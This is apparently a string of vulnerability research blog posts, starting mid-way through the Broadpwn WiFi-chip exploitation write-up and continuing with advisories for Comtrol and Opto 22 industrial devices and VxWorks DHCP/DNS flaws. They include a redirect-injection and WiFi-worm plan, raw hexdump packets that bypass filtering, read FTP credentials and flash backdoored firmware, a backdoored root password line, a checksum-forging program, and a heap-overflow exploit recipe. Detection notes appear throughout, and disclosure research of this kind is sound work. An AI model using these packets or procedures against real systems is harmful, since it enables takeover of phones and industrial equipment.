For the BCM4359, the ring buffer’s beginning address is 0x221ec0. Therefore, if we ensure a packet we control will be written exactly to the beginning of the ring buffer, we can place our fake timer object there, and our payload immediately after it. Of course, making sure that our packet is put exactly at the beginning of the buffer is a serious challenge: We may be in an area with dozens of other APs and STAs, increasing the noise level and causing us to contend with many other packets.

In order to win the contest for the desired spot in the ring buffer, we have set up a dozen Alfa wireless adapters, each broadcasting on a different channel. By causing them to simultaneously bombard the air with packets on all channels, we have reached a situation where we successfully grab the first slot in the ring buffer about 70% of the time. Of course, this result could radically change if we move to a more crowded WiFi environment.

Once we grab the first slot, exploitation is simple: The fake timer object writes to the offset of p_restore_cpsr, overwriting it with the address of an offset within our packet in the first slot. This is where we will store our payload.

Despite the difficulty of this approach and the fact that it requires additional gear, it still offers a powerful alternative to the previous exploitation approach, in that the second approach does not require knowledge of addresses within the system.

THE NEXT STEP – PRIVILEGE ESCALATION

After achieving stable code execution on the Broadcom chip, an attacker’s natural goal would be to escape the chip and escalate their privileges to code execution on the application processor. There are three main approaches to this problem:

  1. Find a bug in the Broadcom kernel driver that handles communication with the chip. The driver and chip communicate using a packet-based protocol, so an extensive attack surface on the kernel is exposed to the chip. This approach is difficult, since, unless a way to leak kernel memory is found, an attacker will not have enough knowledge about the kernel’s address space to carry out a successful exploit. Again, attacking the kernel is made more difficult by the fact that any mistake we make will crash the whole system, causing us to lose our foothold in the WiFi chip.
  2. Using PCIe to read and write directly to kernel memory. While WiFi chips prior to the BCM4358 (the main WiFi chip used on the Samsung Galaxy S6) used Broadcom’s SDIO interface, more recent chips use PCIe, which inherently enables DMA to the application processor’s memory. The main drawback of this approach is that it will not support older phones.
  3. Waiting for the victim to browse to a non-HTTPS site, then, from the WiFi chip, redirecting them to a malicious URL. The main advantage of this approach is that it supports all devices across the board. The drawback is that a separate exploit chain for the browser is required.
    We believe that achieving kernel code execution from the chip is a sufficiently complicated subject as to justify a separate research; it is therefore out of the scope of the current research. However, work has already been done by Project Zero to show that a kernel write primitive can be achieved via PCIe [d].

In the current research, our approach is to use our foothold on the WiFi chip to redirect the user to an attacker-controlled site. This task is made simple by the fact that a single firmware function, wlc_recv(), is the starting point for processing all packets. The signature of this function is as follows:
void wlc_recv(wlc_info *wlc, void *p);

The argument p is a pointer to HNDRTE’s implementation of an sk_buff. It holds a pointer to the packet data, as well as the packet’s length and a pointer to the next packet. We will need to hook the wlc_recv function call, dump the contents of each packet that we receive. and look for packets that encapsulate unencrypted HTTP traffic. At this point, we will modify the packet the include a <script> tag, with the code: “top.location.href = http://www.evilsite.com”.

THE FIRST WIFI WORM

The nature of the bug, which can be triggered without any need for authentication, and the stability of the exploit, which deterministically and reliably reaches code execution, leads us to the return of an old friend: the self-propagating malware, also known as “worm”.

Worms died out around the end of the last decade, together with their essential companion, the remote exploit. They have died out for the same reason: software mitigations have become too mature, and automatic infection over the network became a distant memory. Until now.

Broadpwn is ideal for propagation over WLAN: It does not require authentication, doesn’t need an infoleak from the target device, and doesn’t require complicated logic to carry out. Using the information provided above, an attacker can turn a compromised device into a mobile infection station.

We implemented our WiFi worm with the following steps:

  • In the previous section, we have started running our own payload after restoring the system to a stable state and preventing a chip crash. The payload will hook wlc_recv, in a similar manner to the one showed above.
  • The code in wlc_recv_hook will inspect each received packet, and determine whether it is a Probe Request. Recall that wlc_recv essentially behaves as if it runs in monitor mode: all packets received over the air are handled by it, and only tossed out later if they are not meant for the STA.
    If the received packet is a Probe Request with the SSID of a specific AP, wlc_recv_hook will extract the SSID of the requested AP, and start impersonating as that AP by sending out a Probe Response to the STA.
  • In the next stage, wlc_recv should receive an Authentication Open Sequence packet, and our hook function should send a response. This will be followed by an Association Request from the STA.
  • The next packet we will send is the Association Response containing the WMM IE which triggers for the bug. Here, we’ll make use of the fact that we can crash the targeted chip several times without alerting the user, and start sending crafted packets adapted to exploit a specific firmware build. This will be repeated until we have brute forced the correct set of addresses. Alternatively, the second approach, which relies on spraying the ring buffer and placing the fake timer object and the payload at a deterministic location, can also be used.
  • Running an Alfa wireless adapter on monitor mode for about an hour in a crowded urban area, we’ve sniffed hundreds of SSID names in Probe Request packets. Of these, approximately 70% were using a Broadcom WiFi chip [e]. Even assuming moderate infection rates, the impact of a Broadpwn worm running for several days is potentially huge.

Old school hackers often miss the “good old days” of the early 2000s, when remotely exploitable bugs were abundant, no mitigations were in place to stop them, and worms and malware ran rampant. But with new research opening previously unknown attack surface such as the BCM WiFi chip, those times may just be making a comeback.

References

[a] While KASLR is still largely unsupported on Android devices, the large variety of kernels out there effectively means that an attacker can make very few assumptions about an Android kernel’s address space. Another problem is that any misstep during an exploit will cause a kernel panic, crashing the device and drawing the attention of the victim.

[b] The BCM43xx family has been the subject of extensive security research in the past. Notable research includes Wardriving from Your Pocket (https://recon.cx/2013/slides/Recon2013-Omri%20Ildis%2C%20Yuval%20Ofir%20and%20Ruby%20Feinstein-Wardriving%20from%20your%20pocket.pdf) by Omri Ildis, Yuval Ofir and Ruby Feinstein; One Firmware to Monitor ’em All (http://archive.hack.lu/2012/Hacklu-2012-one-firmware-Andres-Blanco-Matias-Eissler.pdf) by Andres Blanco and Matias Eissler; and the Nexmon project by SEEMOO Lab (https://github.com/seemoo-lab/nexmon). These projects aimed mostly to implement monitor mode on Nexus phones by modifying the BCM firmware, and their insights greatly assisted the author with the current research. More recently, Gal Beniamini of Project Zero has published the first security-focused report about the BCM43xx family (https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html), and has discovered several bugs in the BCM firmware.

This function does not exist in the source code that we managed to obtain, so the naming is arbitrary.

[d] Gal Beniamini’s second blog post about BCM deals extensively with this issue (https://googleprojectzero.blogspot.co.il/2017/04/over-air-exploiting-broadcoms-wi-fi_11.html). And while a kernel read primitive is not demonstrated in that post, the nature of the MSGBUF protocol seems to make it possible.

[e] This is an estimate, and was determined by looking up the OUI part of the sniffed device’s MAC address.

Firmware Updates Made Easy

Contributors: David Barksdale of Exodus Intelligence, Independent Security Researcher Jeremy Brown

These are two vulnerabilities that allow a remote unauthenticated attacker to update firmware. If the device is configured with MAC or IP filtering, the attacker can bypass filtering if they have access to the same network segment as the device.

Comtrol RocketLinx ES8510-XTE

Product Overview

The Comtrol RocketLinx ES8510-XTE is a managed industrial Ethernet switch. It has seven 10/100BASE-TX ports and three additional ports which can be allocated among any of three 10/100BASE-TX ports and three SFP ports. It has two digital-in and two digital-out ports which can be used for alarms or triggering events. It also has an RS-232 console port.

The switch can be managed with a Command Line Interface (CLI) accessible over the console port, SSH, and Telnet; with a web interface; SNMP; and with a Windows program called PortVision DX.

Vulnerability

The CLI, web interface, and SNMP all require authentication, however the PortVision program can carry out certain management tasks without authentication. PortVision sends commands to the switch via UDP packets to port 5010. The switch can be configured to filter packets based on an IP and MAC whitelist to prevent attackers from sending unauthorized commands to the switch. This can be bypassed and an attacker can use the PortVision protocol to upload and flash a backdoored firmware to the switch.

Because the PortVision protocol lacks authentication and can upload and flash firmware files, which also lack cryptographic authentication, an attacker can install a backdoor in the switch. The PortVision protocol is also session-less UDP, allowing an attacker to bypass IP and MAC filtering by sending spoofed packets to the switch.

Comtrol has published firmware version 2.7d which allows users to disable the PortVision service, in earlier versions the service is always available.

PortVision Protocol

PortVision sends requests to network devices using UDP on port 5010, either to the IP broadcast address or unicast to a specific IP. Responses are always sent to the IP broadcast address and the UDP source and destination ports swapped from the request. Both requests and responses have the same format. The data format is a sequence of records having three parts: a 32-bit big-endian type code, a 32-bit big-endian length, and a variable-sized value with the specified length. The type code of the first record in a request is the type of the request and the value of this record is unused. The following records are parameters to the request. The responses usually have a record with an acknowledge type code to match the request, but it is not always the first record in the response. The known type codes are listed below.

PortVision Protocol Record Types

Type Code Description
1 Manufacturer string
2 Model string
3 MAC address (6 bytes)
4 IP address (4 bytes)
5 IP netmask (4 bytes)
6 IP gateway (4 bytes)
7 Discovery request
8 Discovery acknowledgement
11 IP configuration request
12 IP configuration acknowledgement
21 Configuration file backup request
24 Configuration file restore request
27 Configuration file load default request
25 Reset to factory defaults acknowledgement
31 Firmware upgrade request
32 Firmware upgrade acknowledgement
33 Firmware upgrade error string
34 Version string
35 Bootloader upgrade request
43 TFTP clear file request (clears /home/Quaaga.conf and /home/firmware.bin)
44 Reboot request
45 Reset to factory defaults request
91 LED signal on request
92 LED signal off request
94 SFP check request
111 Self-test request

The IP configuration, factory reset, and reboot requests require a MAC address record matching the network device intended to carry out the request.

Disabling Security

The switch can be configured with IP and MAC whitelists. The attacker can discover a whitelisted IP address by sending a PortVision discovery request to the IP broadcast address from every IP address in a subnet looking for responses. The response from the switch is also sent to the IP broadcast address. In order to determine which IP address was in the whitelist, each discover request is sent from a unique UDP source port, the discovery reply is sent back to the same port. The MAC filtering is bypassed by sending packets from the Ethernet broadcast address (FF:FF:FF:FF:FF), which is always allowed through the filter. This can only be done if the attacker is on the same network segment as the switch.

The discovery request has one record of type 7, length 1, and data 1:

00 00 00 07 00 00 00 01 01

The example discovery reply below has the following records:

Manufacturer string: Comtrol

Model string: ES8510-XTE

Discovery acknowledgement: ack

IP address: 10.100.0.5

IP netmask: 255.255.255.0

MAC address: 00:c0:4e:30:01:93

Version string: v2.7c (b1.6.2.12)

Type 9: 00 00 00 00

IP gateway: 10.100.0.1

Type 222: 00 00 00 00

00000000 00 00 00 01 00 00 00 07 43 6f 6d 74 72 6f 6c 00 ........ Comtrol.
00000010 00 00 02 00 00 00 0a 45 53 38 35 31 30 2d 58 54 .......E S8510-XT
00000020 45 00 00 00 08 00 00 00 03 61 63 6b 00 00 00 04 E....... .ack....
00000030 00 00 00 04 0a 64 00 05 00 00 00 05 00 00 00 04 .....d.. ........
00000040 ff ff ff 00 00 00 00 03 00 00 00 06 00 c0 4e 30 ........ ......N0
00000050 01 93 00 00 00 22 00 00 00 11 76 32 2e 37 63 20 .....".. ..v2.7c
00000060 28 62 31 2e 36 2e 32 2e 31 32 29 00 00 00 09 00 (b1.6.2. 12).....
00000070 00 00 04 00 00 00 00 00 00 00 06 00 00 00 04 0a ........ ........
00000080 64 00 01 00 00 00 de 00 00 00 04 00 00 00 00 -- d....... .......

Once a whitelisted IP is found, security can be disabled by issuing a factory reset request:

00000000 00 00 00 2d 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93

The IP configuration from the discovery reply above can then be restored by issuing an IP configuration request:

00000000 00 00 00 0b 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93 00 00 00 04 00 00 00 04 0a
00000020 64 00 05 00 00 00 05 00 00 00 04 ff ff ff 00 00
00000030 00 00 06 00 00 00 04 0a 64 00 01

If only IP filtering is configured and the attacker already knows the MAC and IP of the switch and an IP address on the whitelist and the attacker can send it packets with a spoofed IP source address, then the firmware update can be carried out from outside the local network segment and without the need for a factory reset.

Backdooring the Firmware

A backdoored firmware image is created by extracting the parts of the 2.7c firmware image—the kernel, the squashfs filesystem, and the trailer—and then modifying the /etc/passwd file to allow the root user to login over SSH, and then recombining the parts and updating the checksum in the trailer.

Firmware Parts

Offset Size Description
0 0x100000 Kernel
0x100000 0x459000 SquashFS Root
0x559000 0x1000 Trailer

The squashfs filesystem can be extracted and re-made using the squashfs-2.2-r2-7z code from Firmware Mod Kit. The only modification made is to give root the password “exodus” and the shell /bin/sh.

root:$1$$xNQSqSIqPHr/jbk09AEDa1:0:0:root:/home:/bin/sh

The new squashfs filesystem is combined with the original kernel and tailer parts and the checksum in the trailer is updated with the following C program.

#include <endian.h>
#include <stdint.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  FILE *fp = fopen(argv[1], "r+");
  if (!fp) {
    perror("fopen");
    return -1;
  }

  // sum every little-endian 32-bit word in the file
  uint32_t checksum = 0;
  uint32_t buf[1024];
  int i;
  while (1024 == fread(buf, 4, 1024, fp)) {
    for (i = 0; i < 1024; i++)
      checksum += le32toh(buf[i]);
  }

  // subtract out the last block
  for (i = 0; i < 1024; i++)
    checksum -= le32toh(buf[i]);
  printf("checksum = 0x%08X\n", checksum);

  // print out the obfuscated product-version string
  printf("Firmware Version: ");
  uint8_t *bytes = (uint8_t *)buf;
  for (i = 791; i < 791 + 34; ++i) {
    bytes[i] -= 103;
    printf("%c", bytes[i]);
  }
  printf("\n");

  // checksum is stored in little endian at offset 283
  fseek(fp, -4096 + 283, SEEK_CUR);
  checksum = htole32(checksum);
  printf("writing checksum at offset %ld\n", ftell(fp));
  fwrite(&checksum, 4, 1, fp);
  fclose(fp);
}

Flashing the Firmware

The backdoored firmware is transferred using TFTP to the destination path /home/firmware.bin on the switch. Then a PortView request is sent to command the switch to flash the firmware:

00 00 00 1f 00 00 00 01 01

And another to reboot the switch:

00000000 00 00 00 2c 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93

Detection Guidance

Exploitation attempts can be detected by monitoring network traffic for unexpected TFTP and PortVision traffic. The PortVision software periodically polls the network with discovery requests, but firmware upgrade requests should be rare and only during planned maintenance.

Opto 22 OPTEMU-SNR-DR2

Product Overview

The Opto 22 OPTEMU-SNR-DR2 is an energy monitoring and control device. It can monitor two KY or KYZ pulsing devices and up to 64 data inputs from Modbus devices over serial or Ethernet. It has four relay outputs for controlling equipment or signaling other energy or building management systems.

The device can be managed over Ethernet using the OptoMMP, PAC Control, FTP, and SNMP protocols.

The latest firmware as of this publication (version 9.2b) is vulnerable.

Vulnerability

The FTP and SNMP protocols both support authentication, however the OptoMMP and PAC Control protocols do not support authentication. The OptoMMP protocol can be used for administrative tasks like modifying IP filtering rules and the credentials used for FTP authentication. The PAC Control protocol is not used in this exploit but also provides a high level of access to the device’s functions.

The device does not use cryptographic authentication to verify new firmware images and will accept a malicious firmware uploaded over FTP. The FTP authentication credentials can be read directly from the device using the OptoMMP protocol, which itself has no authentication. The OptoMMP protocol has a session-less UDP mode, allowing an attacker to bypass IP filtering by sending spoofed packets to the device.

OptoMMP Protocol

The OptoMMP protocol is documented in OptoMMP Protocol Guide. The protocol is based on IEEE 1394 and presents a memory-map which can be read and written by byte addresses. It can be accessed via TCP or UDP on port 2001. The memory addresses relevant to this exploit are listed below.

OptoMMP Security Fields

Address Size Description
0xfffff03a0010 0x4 FTP port
0xfffff03d0000 0x40 FTP username
0xfffff03d0040 0x40 FTP password
0xfffff03a0020 0x4 IP Filter Address
0xfffff03a0024 0x4 IP Filter Mask
(eight address-mask pairs omitted)
0xfffff03a0068 0x4 IP Filter Address
0xfffff03a006c 0x4 IP Filter Mask
0xfffff0300080 0x20 Device’s part number

Disabling Security

The device can be configured with IP filtering whitelists and the FTP service can be disabled by setting its port number to zero. A whitelisted IP address can be discovered by sending an OptoMMP read request to the broadcast address from every IP address in a subnet looking for responses. This can only be done if the attacker is on the same network segment as the device.

The following packet hexdump shows the contents of the UDP packets used to discover a whitelisted IP address. The packets are sent to the IP broadcast address 255.255.255.255. The IP source address is different for each packet as it is scanned through a range of addresses. At the UDP layer the packets are sent to port 2001 and the source port is randomly chosen. The transaction label (the six high-order bits in the third byte) is also chosen randomly.

00 00 bc 50 00 00 ff ff f0 30 00 80 00 20 00 00

The reply to the read block request is unicast back to the source port and IP address of the request.

00000000 00 00 ec 70 00 00 00 00 00 00 00 00 00 20 00 00 ...p.... ..... ..
00000010 4f 50 54 4f 45 4d 55 2d 53 4e 52 2d 44 52 32 00 OPTOEMU- SNR-DR2.
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........

The FTP port is then set to 21 with a write block request to ensure that FTP is enabled. The response is ignored.

00000000 00 00 b8 10 00 00 ff ff f0 3a 00 10 00 04 00 00
00000010 00 00 00 15

The ten IP filter mask values are all set to 0.0.0.0 with ten write block requests. The responses are ignored.

00000014 00 00 04 10 00 00 ff ff f0 3a 00 24 00 04 00 00
00000024 00 00 00 00
00000028 00 00 80 10 00 00 ff ff f0 3a 00 2c 00 04 00 00
00000038 00 00 00 00
0000003C 00 00 04 10 00 00 ff ff f0 3a 00 34 00 04 00 00
0000004C 00 00 00 00
00000050 00 00 14 10 00 00 ff ff f0 3a 00 3c 00 04 00 00
00000060 00 00 00 00
00000064 00 00 d8 10 00 00 ff ff f0 3a 00 44 00 04 00 00
00000074 00 00 00 00
00000078 00 00 c0 10 00 00 ff ff f0 3a 00 4c 00 04 00 00
00000088 00 00 00 00
0000008C 00 00 90 10 00 00 ff ff f0 3a 00 54 00 04 00 00
0000009C 00 00 00 00
000000A0 00 00 38 10 00 00 ff ff f0 3a 00 5c 00 04 00 00
000000B0 00 00 00 00
000000B4 00 00 a8 10 00 00 ff ff f0 3a 00 64 00 04 00 00
000000C4 00 00 00 00
000000C8 00 00 d8 10 00 00 ff ff f0 3a 00 6c 00 04 00 00
000000D8 00 00 00 00

The FTP username is obtained with a read block request:

00 00 08 50 00 00 ff ff f0 3d 00 00 00 40 00 00

In this example the configured FTP username is “admin”:

00000000 00 00 08 70 00 00 00 00 00 00 00 00 00 40 00 00 ...p.... .....@..
00000010 61 64 6d 69 6e 00 00 00 00 00 00 00 00 00 00 00 admin... ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........

The FTP password is also obtained with a read block request:

00 00 9c 50 00 00 ff ff f0 3d 00 40 00 40 00 00

In this example the configured FTP password is “exodus”:

00000000 00 00 9c 70 00 00 00 00 00 00 00 00 00 40 00 00 ...p.... .....@..
00000010 65 78 6f 64 75 73 00 00 00 00 00 00 00 00 00 00 exodus.. ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........

At this point the firmware can be upgraded using the FTP server on port 21.

Firmware

The firmware image is a raw image that is stored in flash memory which is mapped into the CPUs address space at 0x60000000. The firmware has an ANSI CRC16 checksum stored as a big-endian 32-bit number at offset 0x3f8 into the file and the file size is stored as a big-endian 32-bit number at offset 0x3fc into the file.

Flashing the Firmware

The firmware is uploaded over FTP to the device into the root directory. The command to program the firmware into flash memory is the string “Krn <filename>” uploaded as a file named “commandfile” over FTP. The result of the command can be read back by downloading the “commandfileresponse” file. The following is a transcript from the FTP control connection.

220 Opto 22 FTP server ready.
USER admin
331 Please specify the password.
PASS exodus
230 User logged in, proceed.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,250,245).
STOR payload
150 File status okay; about to open data connection.
226 Closing data connection.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,205,91).
STOR commandfile
150 File status okay; about to open data connection.
226 Closing data connection.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,159,210).
RETR commandfileresponse
150 File status okay; about to open data connection.
226 Closing data connection.
221 Goodbye.

The device automatically reboots after successful programming.

This procedure leaves the networking configuration intact but clears other configuration and programming of the device.

Detection Guidance

Exploitation attempts can be detected by monitoring network traffic for unexpected FTP and OptoMMP traffic. Firmware upgrades should be rare and only during planned maintenance.

VxWorks: Execute My Packets

Contributors

David Barksdale and Alex Wheeler

1. Background

Earlier this year we reported 3 vulnerabilities in VxWorks to Wind River. Each of these vulnerabilities can be exploited by anonymous remote attackers on the same network without user interaction to take control of the affected device. VxWorks is widely used in Aerospace and Defense, Automotive, Industrial, Medical, Consumer Electronics, Networking and Communication Infrastructure applications (https://en.wikipedia.org/wiki/VxWorks#Notable_uses).

2. Summary

As of this writing the flaws have not been assigned CVE numbers, they are:

  1. DHCP client heap overflow in handle_ip() affecting VxWorks 6.4 and prior
  2. DHCP server stack overflow in ipdhcps_negotiate_lease_time() affecting VxWorks 6.9 versions prior to 6.9.3.1, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5 and prior versions
  3. DNS client stack overflow in ipdnsc_decode_name() affecting VxWorks 7, VxWorks 6.9, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5

Please login to your support account on windriver.com or contact your Wind River support representative for mitigation of these issues.

3. Vulnerabilities

A. DHCP IP Address Option Client Heap Overflow

VxWorks 6.4 and prior fail to properly handle the lengths of IP addresses in DHCP Options in  handle_ip() and handle_ips().  handle_ip() contains a trivial overflow and will be the focus of this section. The flaw was initially found while auditing the network stack of IN_DISCLOSURE. Below is the disassembly describing the flaw in handle_ip() from the IN_DISCLOSURE firmware.

RAM:803D6D38 handle_ip: # DATA XREF: RAM:80F18AC8o
RAM:803D6D38            # RAM:80F18B04o ...
RAM:803D6D38
RAM:803D6D38 addiu $sp, -0x28
RAM:803D6D3C sw    $s3, 0x28+var_C($sp)
RAM:803D6D40 sw    $s2, 0x28+var_10($sp)
RAM:803D6D44 sw    $s0, 0x28+var_18($sp)
RAM:803D6D48 sw    $ra, 0x28+var_8($sp)
RAM:803D6D4C sw    $s1, 0x28+var_14($sp)
RAM:803D6D50 move  $s3, $a0
RAM:803D6D54 lb    $s1, 0($s3)
RAM:803D6D58 move  $s2, $a1
RAM:803D6D5C li    $v0, 0x36
RAM:803D6D60 beq   $s1, $v0, __copy_option__ # code == 36h
RAM:803D6D64 addiu $s0, $s2, 0x98
RAM:803D6D68 li    $v0, 0x20
RAM:803D6D6C beq   $s1, $v0, __copy_option__ # code == 20h
RAM:803D6D70 addiu $s0, $s2, 0xB8
RAM:803D6D74 li    $a0, 1 # num
RAM:803D6D78 jal   my_calloc # 4 byte buffer
RAM:803D6D7C li    $a1, 4 # size
RAM:803D6D80 move  $s0, $v0
RAM:803D6D84 beqz  $s0, __exit__ # calloc() == ERROR
RAM:803D6D88 li    $v0, 0xFFFFFFFF
<...SNIP...>
RAM:803D6E28 __copy_option__: # CODE XREF: handle_ip+28j
RAM:803D6E28 lbu   $a2, 1($s3) # len (1 BYTE FROM PACKET)
RAM:803D6E2C move  $a1, $s0 # dst (4 BYTE BUFFER)
RAM:803D6E30 jal   my_bcopy
RAM:803D6E34 addiu $a0, $s3, 2 # src (OptionPtr + 2)
RAM:803D6E38 move  $v0, $zero
RAM:803D6E3C __exit__: # CODE XREF: handle_ip+4Cj
RAM:803D6E3C lw    $ra, 0x28+var_8($sp)
RAM:803D6E40 lw    $s3, 0x28+var_C($sp)
RAM:803D6E44 lw    $s2, 0x28+var_10($sp)
RAM:803D6E48 lw    $s1, 0x28+var_14($sp)
RAM:803D6E4C lw    $s0, 0x28+var_18($sp)
RAM:803D6E50 jr    $ra
RAM:803D6E54 addiu $sp, 0x28
RAM:803D6E54 # End of function handle_ip

As described in the disassembly above, the vulnerability is caused by using a DHCP option length from the packet to copy into a 4 byte heap buffer, resulting in a heap overflow. This vulnerability can be exploited by responding to an affected device’s DHCP request with a malicious response containing a DHCP option length larger than 4 for the following DHCP option codes: 1, 16, 28, 32, and 54.

B. DHCP Option Lease Time Negotiation Server Stack Overflow

VxWorks 6.5 through VxWorks 6.9.3 fail to properly validate a lease time length when a DHCP server parses DHCP option 51 in ipdhcps_negotiate_lease_time(), which results in a stack overflow. The flaw is caused by using a DHCP IP Address Time option length from the packet to copy into a 4 byte stack buffer, resulting in a stack overflow. In either a DHCP Discovery or Request packet, the attacker simply includes an option of type 51 (the lease time option) that is larger than the expected 4 bytes. The entire contents of the option record (up to 255 bytes) will be copied into a buffer on the stack that is only 4 bytes.

C. DNS Response Decompression Stack Overflow

VxWorks 6.5 through VxWorks 7 fail to properly bound the decompression of names in ipdnsc_decode_name() which results in a stack overflow. The following is a snippet of the affected code for your review.

IP_STATIC Ip_s32
ipdnsc_decode_name(Ip_u8 *name, Ip_u8 *buf, Ip_u8 *start, Ip_u8 *end)
{
  Ip_u8 *ptr, *prev;
  Ip_s32 i, len, tot_len = 0, compress = 0;

  ptr = buf;
  while (*ptr && ptr < end)
  {
    /* Loop until we find a non-pointer */
    while ((*ptr & 0xc0) == 0xc0 && ptr < end)
    {
      prev = ptr;
      ptr = start + (IP_GET_NTOHS(ptr) & 0x3fff);
      if (ptr >= prev)
        return -1; /* Do not allow forward jumps (avoid loops) */
      if (!compress)
        tot_len += 2;
      compress = 1;
    }
    /* Store the length of the label */
    if (ptr >= end)
      return -1;
    len = *ptr++;
    if (len > IPDNSC_MAXLABEL)
      return -1;
    if (!compress) 
      tot_len = tot_len + len + 1;
    if (tot_len > IPDNSC_MAXNAME)
      return -1;
    /* Copy the label to name */
    for (i=0; i<len; i++)
    {
      if (ptr >= end)
        return -1;
      *name++ = *ptr++;
    }
    *name++ = '.';
  }

  if (!compress)/* Increment for the last zero */
    tot_len++;

  /* Null terminate the name string */
  if (tot_len)
    name--;
  *name = 0;
  return tot_len;
}

In the above code, the programmer fails to properly bound the decoded name to IPDNSC_MAXNAME when decompression is involved.  The only caller to this function, ipdnsc_parse_response(), passes the address of a 255-byte stack buffer as the output buffer name. When an attacker causes the target to process a DNS response with a name record that decompresses to larger than 255 bytes, the stack buffer will be overflowed.

4. Exploitation

Attack Vectors

All 3 vulnerabilities may be exploited by anonymous remote attackers on the same network as the target. Since the DHCP vulnerabilities are reachable over UDP and we found no TTL enforcement, in theory, an anonymous remote attacker may be able to exploit them while not on the same network by spoofing packets. Non-local network exploitation seems more plausible against the DHCP Option IP Lease Time Server Stack Overflow than the DHCP Option IP Client Heap Overflow – mainly because you need to guess the client’s 2 byte Transaction ID to trigger the client overflow (spoof, spray, and pray). The DNS Decompression Stack Overflow may be exploited by attackers that are on the same network, in control of a name server, or MITM between the target and a legit name server.

The remainder of this post discusses exploitation of the DHCP IP Option Client Heap Overflow. The stack overflows are left as an exercise for the reader.

Exploiting the Heap Overflow in handle_ip()

The DHCP client heap overflow occurs when parsing option records in the DHCP Offer packet normally sent to clients from a DHCP server during start-up and periodically afterwards. DHCP option records which correspond to IP address values (type 1, 16, 28, 32, and 54) are assumed to have a length of four bytes and the function which processes these options (named handle_ip) allocates a 4-byte buffer on the heap. However when copying the contents of the option record into the buffer, the function uses the length value in the option record for the number of bytes to copy. An attacker can provide up to 255 bytes to copy into the 4-byte heap buffer.

While we weren’t able to test all affected versions on all platforms, we were able to develop an exploit for two IP Deskphones from two different vendors both running VxWorks 5.5 on MIPS32.

In broad strokes our exploit needs to corrupt heap metadata in such a way that gives us control of execution, then it needs to flush our exploit code from the data cache to main memory (MIPS has separate data and instruction caches) so it can be executed, then it needs to jump to that code. The exploit code then needs to repair the heap and for convenience start an OS task that executes whatever payload we may have.

The heap allocator maintains a doubly-linked list of free chunks which it scans when allocating memory. The previous and next pointers are stored in the chunk header along with the size of the chunk, a flag indicating if the chunk is free or allocated, and a pointer to the previous chunk in memory.

Previous Chunk Free Chunk Next Chunk
Previous chunk pointer Chunk size and free flag Next free chunk pointer Previous free chunk pointer Data

Our exploit overwrites the previous and next pointers of a free chunk and then allocates that chunk. During allocation the free chunk is removed from the doubly-linked list, giving us the ability to write an arbitrary 4-byte value to an arbitrary location in memory. In order to get control of execution we overwrite the function pointer in the table of DHCP option handling functions for option type 48, then cause that function to be called by adding an option of that type to our DHCP Offer packet.

To accomplish this we need to arrange the heap so that our buffer is adjacent to a free heap chunk of a known size, overflow that chunk’s header, and then allocate that chunk. This turns out to be easier than it sounds. The following DHCP option list does the job in most cases:

    Code   Len
   +-----+-----+
   |  3  |  0  |
   +-----+-----+
   |  4  |  0  |
   +-----+-----+
   \\    \\    \\
   +-----+-----+
   | 11  |  0  |
   +-----+-----+
   |  1  |  0  |
   +-----+-----+---\\---+
   |  1  | 32  |  Data  |
   +-----+-----+---\\---+
   | 28  | ... |
   +-----+-----+
   | 48  | ... |
   +-----+-----+

Option codes 3-11 cause two small allocations from the heap each, this helps defragment the heap and makes it more likely that the next chunk on the free list is large enough for our next two allocations. Assuming the next free chunk is large enough, the heap allocator will split it into two smaller chunks and return the one at the end for our first option 1. When handle_ip() processes the second option 1 record, it will allocate the heap buffer (which will be before and adjacent to the one we just allocated), notice that a buffer for option 1 was already allocated and free it (adding it to the head of the free list), then write our 32 bytes of data into the buffer which overflows into the metadata of the first free chunk on the free list. Option 28 then allocates that corrupt chunk and in doing so overwrites the function pointer for handling option 48. Option 48 then calls that pointer and we have control of execution.

We will post more details about exploitation of this issue in the near future, after IN_DISCLOSURE have had a chance to publish a fix. If you have a VxWorks-based device and would like us to develop a PoC for it, please contact info@exodusintel.com with the details.

5. Detection

A. DHCP Option IP Address Client Heap Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Codes 1, 16, 28, 32, and 54 for values greater than 4 in DHCP Offers.

B. DHCP Option Lease Time Server Stack Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Code 51 for values greater than 4 in DHCP Discover and Request packets.

C. DNS Response Decompression Stack Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining names in DNS responses for compression that results in a decoding of a name to larger than 255 bytes.

Exodus Intelligence 2016 Training Course

threat intelligenceVulnerability Development Master Class

Since our inception, Exodus Intelligence has provided training courses on a variety of advanced subjects which have consistently been filled with students from around the world. Over the last few years, we’ve hosted Master Classes in the USA, Asia, and Europe–both publicly and privately (by request).

Once again, our flagship course–the Vulnerability Development Master Class–returns with new content, taught by recognized experts. Known as some of the best in the industry, Exodus instructors are armed with real-world experience, as well as multiple Pwn2Own victories and PWNIE awards. Continue reading

Execute My Packet

Contributors

David Barksdale, Jordan Gruskovnjak, and Alex Wheeler

1. Background

